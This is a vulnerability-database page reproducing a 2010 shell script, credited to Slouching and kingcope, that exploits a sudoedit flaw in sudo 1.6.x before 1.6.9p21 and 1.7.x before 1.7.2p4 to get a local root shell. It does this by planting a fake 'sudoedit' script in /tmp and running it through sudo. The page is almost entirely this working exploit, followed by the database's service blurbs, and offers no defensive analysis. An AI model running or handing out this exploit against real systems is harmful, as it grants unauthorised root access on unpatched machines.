Lucene search
K

Todd Miller sudoedit Root Exploit

🗓️ 03 Mar 2010 00:00:00Reported by KingcopeType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Tod Miller sudoedit Root Exploit March 2010 automated by kingcope

Code
`#!/bin/sh  
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4  
# local root exploit  
# March 2010  
# automated by kingcope  
# Full Credits to Slouching  
echo Tod Miller Sudo local root exploit  
echo by Slouching  
echo automated by kingcope  
if [ $# != 1 ]  
then  
echo "usage: ./sudoxpl.sh <file you have permission to edit>"  
exit  
fi  
cd /tmp  
cat > sudoedit << _EOF  
#!/bin/sh  
echo ALEX-ALEX  
su  
/bin/su  
/usr/bin/su  
_EOF  
chmod a+x ./sudoedit  
sudo ./sudoedit $1  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation